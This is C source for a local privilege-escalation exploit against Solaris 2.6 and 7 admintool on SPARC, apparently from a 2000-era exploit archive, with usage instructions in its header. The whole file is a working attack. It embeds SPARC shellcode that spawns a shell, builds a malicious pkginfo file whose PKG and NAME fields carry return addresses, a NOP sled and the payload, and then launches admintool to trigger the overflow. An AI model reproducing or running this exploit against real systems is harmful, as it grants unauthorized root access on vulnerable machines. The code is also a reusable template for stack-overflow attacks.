/*=============================================================================
   admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)
   [usage]
        % setenv DISPLAY=yourdisplay:0.0
        % gcc ex_admintool.c (This example program)
        % a.out
       ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
         -> Directory: /tmp -> [Ok] )
        #
 
   In /tmp/EXP directory, the temp files are made, please remove it.
  =============================================================================
*/

#include <stdio.h>
#include <sys/utsname.h>

#define ADJUST1     2
#define ADJUST2     1
#define BUFSIZE1    1000
#define BUFSIZE2    800
#define OFFSET      3600
#define OFFSET2     400

#define PKGDIR      "mkdir /tmp/EXP"
#define PKGINFO     "/tmp/EXP/pkginfo"
#define PKGMAP      "/tmp/EXP/pkgmap"

#define NOP         0xa61cc013

char exploit_code[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
  "\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
  "\x94\x10\x20\x10\x94\x22\xa0\x10"
  "\x9c\x03\xa0\x14"
  "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
  "\x91\xd0\x20\x08"
  ;

unsigned long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char   x[500000];
FILE    *fp;
int     i,vofs=0;
struct utsname name;
main()
{
  uname(&name);
  if (strcmp(name.release,"5.7")==0) vofs=-904;

  system(PKGDIR);
  putenv("LANG=");
  if ((fp=fopen(PKGMAP,"wb"))==NULL)
    {
      printf("Can not write '%s'\n",PKGMAP);
      exit(1);
    }
  fclose(fp);

  if ((fp=fopen(PKGINFO,"wb"))==NULL)
    {
      printf("Can not write '%s'\n",PKGINFO);
      exit(1);
    }
  fprintf(fp,"PKG=");

  ret_adr=get_sp()-OFFSET+vofs;
  while ((ret_adr & 0xff000000) == 0 ||
         (ret_adr & 0x00ff0000) == 0 ||
         (ret_adr & 0x0000ff00) == 0 ||
         (ret_adr & 0x000000ff) == 0)
    ret_adr += 4;

  printf("Jumping address = %lx\n",ret_adr);
  memset(x,'a',4);
  for (i = ADJUST1; i < 1000; i+=4)
    {
      x[i+3]=ret_adr & 0xff;
      x[i+2]=(ret_adr >>8 ) &0xff;
      x[i+1]=(ret_adr >> 16 ) &0xff;
      x[i+0]=(ret_adr >> 24 ) &0xff;
    }
  x[BUFSIZE1]=0;
  fputs(x,fp);
  fprintf(fp,"\n");

  fprintf(fp,"NAME=");
  memset(x,'a',4);
  for (i = ADJUST2; i < BUFSIZE2; i+=4)
    {
      x[i+3]=NOP & 0xff;
      x[i+2]=(NOP >> 8 ) &0xff;
      x[i+1]=(NOP >> 16 ) &0xff;
      x[i+0]=(NOP >> 24 ) &0xff;
    }
  for (i=0; i<strlen(exploit_code); i++)
    x[i+ADJUST2+OFFSET2]=exploit_code[i];
  x[BUFSIZE2]=0;
  fputs(x,fp);
  fprintf(fp,"\n");

  fprintf(fp,"VERSION=1.00\n");
  fprintf(fp,"ARCH=sparc\n");
  fprintf(fp,"CLASSES=none\n");
  fprintf(fp,"CATEGORY=application\n");
  fprintf(fp,"PSTAMP=990721\n");
  fprintf(fp,"BASEDIR=/\n");
  fclose(fp);
  system("admintool");
}

/*                    www.hack.co.za              [2000]*/